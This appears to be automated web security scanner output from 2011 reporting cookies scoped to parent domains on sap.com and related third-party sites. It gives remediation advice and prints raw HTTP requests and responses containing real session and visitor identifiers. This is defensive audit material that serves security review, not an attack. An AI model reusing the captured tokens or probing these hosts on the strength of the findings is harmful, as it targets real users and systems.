A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-Cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:15:23 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: itvisitorid10002109824374=Kd30fNBLaa|M7bgHDDi|fvis10002109824374=Zj1odHRwcyUzQS8vd3d3LnNhcC5jb20vc21lL2NvbnRhY3RzYXAvaW5kZXguZXB4JmI9Q29udGFjdCUyMFNBUA==|T|T|T|T|8M8o078HsM|T; path=/; domain=.analytics.yahoo.com
Set-Cookie: itsessionid10002109824374=Kd30fNBLaa|fses10002109824374=; path=/; domain=.analytics.yahoo.com
TS: 0 205 dc4_ird
Pragma: no-cache
Expires: Sat, 15 Oct 2011 15:15:24 GMT
Cache-Control: no-cache, private, must-revalidate
Content-Length: 45
Accept-Ranges: bytes
Tracking-Status: fpc site tracked
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Response
HTTP/1.1 301 Moved Permanently
Set-Cookie: nwt=wetnow; path=/
Set-Cookie: ARPT=ONKKMMS169.145.6.18CKMMM; path=/
Cache-Control: private
Content-Length: 0
Location: /index.epx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:20:42 GMT; path=/
Set-Cookie: session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; domain=.sap.com; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 15:20:42 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:20:42 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://store.businessobjects.com/store/bobjamer ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 302 Moved Temporarily
Date: Sat, 15 Oct 2011 14:55:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
Set-Cookie: LivePersonID=-546022977410-1318690536:-1:-1:-1:-1; expires=Sun, 14-Oct-2012 14:55:47 GMT; path=/hc/37021986; domain=.liveperson.net
Location: https://sales.liveperson.net/hc/37021986/?cmd=file&file=visitorWantsToTalk&site=37021986&visitor=546022977410&msessionkey=449600187523043155&SV!EngageRoom=sales-sap-general-us-en&SV!chat-button-name=voice-sales-sap-general-us-en-1&SV!chat-button-room=voice-sales-sap-general-us-en-1&referrer=(button%20dynamic-button:voice-sales-sap-general-us-en-1(SAP%20Business%20Management%20Software%20Solutions%2C%20Applications%20and%20Services%20%7C%20SAP))%20http%3A//www.sap.com/index.epx&visitor=546022977410&msessionkey=449600187523043155
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 15 Oct 2011 15:28:16 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sat, 15-Oct-2011 15:27:56 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: partnerUID="eyIxNjkiOiBbIjRlOTlhNDE4NDgyNjQ1NTQiLCB0cnVlXSwgIjc5IjogWyIyN2EzZjEzOWQ4ZmUyYjYzN2Y0Njg0N2UwOTI1N2NhYiIsIHRydWVdfQ=="; Domain=invitemedia.com; expires=Sun, 14-Oct-2012 15:28:16 GMT; Path=/
Content-Length: 43
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: training.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
{"method":"TrackEventInteraction","arguments":["http://www.sap.com/index.epx#/buy-now/index.epx?class=utilitynav-buy","","CLICK","Shop the Business Center","http://store.sap.com/","","ClickArea=CTA"," ...[SNIP]...
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:32:46 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:32:46 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:32:46 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /asset/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18873
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:58 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:58 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19 ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 251
Content-Type: text/html; charset=utf-8
Location: https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore&kNtBzmUK9zU=1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:32:09 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:32:09 GMT; path=/
Set-Cookie: CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore&ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fDRHM%2fstore%3fAction%3dDisplayProductDetailsPage%26SiteID%3dbobjamer%26Locale%3den_US%26Env%3dBASE%26productID%3d231860300%26parentCategoryID%3d57065700%26categoryID%3d57066300%26_s_icmp%3dCG4E7A594; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:32:09 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:32:09 GMT

<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore& ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /common/formAbandonWarning.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 4767
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:57 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:57 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19 ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /customer-showcase/growth/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43268
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:37 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:37 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000003,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:37 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /customer-showcase/meetcustomers/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42048
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:38 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:38 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000003,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:38 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://www.sap.com/host.epx?kNtBzmUK9zU">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hana/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23602
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:17 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:17 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000003,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:17 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19 ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /lines-of-business/lines-of-business-spotlight.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22042
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:05 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:05 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000009,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:05 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19 ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /partners/partnerwithsap/business-objects-crystal/north-american-resellers.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42472
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:27 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:27 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:27 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>